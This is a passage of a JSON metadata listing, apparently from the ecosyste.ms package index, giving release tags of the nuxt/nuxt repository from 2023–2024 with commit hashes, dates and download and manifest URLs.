hub.com/nuxt/nuxt/releases/tag/v3.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0/manifests"},{"name":"v3.12.4","sha":"4a1349f700aa6af14253de7363acf243ecad2c02","kind":"commit","published_at":"2024-07-18T22:30:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4/manifests"},{"name":"v3.12.3","sha":"a9fcd82d8eeaf750205838a4e96e9478f18a154f","kind":"commit","published_at":"2024-07-02T15:05:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3/manifests"},{"name":"v2.18.1","sha":"81f5335f26b4f593004a503f2ec7d9a6fd723b64","kind":"tag","published_at":"2024-06-28T11:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1/manifests"},{"name":"v2.18.0","sha":"9f5fc19018ae2d6c9afe2ece12d86cba7bbed8f8","kind":"tag","published_at":"2024-06-27T15:41:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0/manifests"},{"name":"v3.12.2","sha":"8578e2bd62bdf3ce9dab70c7241a3953feb043b7","kind":"commit","published_at":"2024-06-16T07:36:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2/manifests"},{"name":"v2.17.4","sha":"5b437353d0ae6972e7a35a47feb8062949daf625","kind":"tag","published_at":"2024-06-14T13:46:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4/manifests"},{"name":"v3.12.1","sha":"41fc45da254408921972ab626101c41cea70de32","kind":"commit","published_at":"2024-06-11T10:50:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1/manifests"},{"name":"v3.12.0","sha":"9f06842fa1b323bd0e0911b0335a091a9052b5c3","kind":"commit","published_at":"2024-06-11T08:44:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0/manifests"},{"name":"@nuxt/ui-templates@1.3.3","sha":"a16107b93bad4fd5a25d48598967e11b59b7baf3","kind":"tag","published_at":"2024-04-05T12:43:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3/manifests"},{"name":"v3.11.2","sha":"3c90aaf8e21955cf0644df2e0b09e3e33441e8e2","kind":"commit","published_at":"2024-04-04T16:04:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2/manifests"},{"name":"@nuxt/ui-templates@1.3.2","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2/manifests"},{"name":"@nuxt/ui-assets@0.2.1","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1/manifests"},{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"@nuxt/ui-templates@1.3.1","sha":"26a0745b9cc3a60aa8bf86c74ab3ff7ec4717058","kind":"tag","published_at":"2023-07-29T03:33:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1/manifests"},{"name":"@nuxt/ui-templates@1.3.0","sha":"039126dac7070eeae2eae16fcb423f6b77a4fc0d","kind":"tag","published_at":"2023-07-28T16:37:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0/manifests"},{"name":"@nuxt/ui-templates@1.2.1","sha":"57e237b03ecb63319727dd407f01be6c6540deab","kind":"tag","published_at":"2023-07-26T09:19:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"@nuxt/ui-templates@1.2.0","sha":"5f6e505ea476ed8ede4edbd4d1fb3dcae0189705","kind":"tag","published_at":"2023-06-20T11:29:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"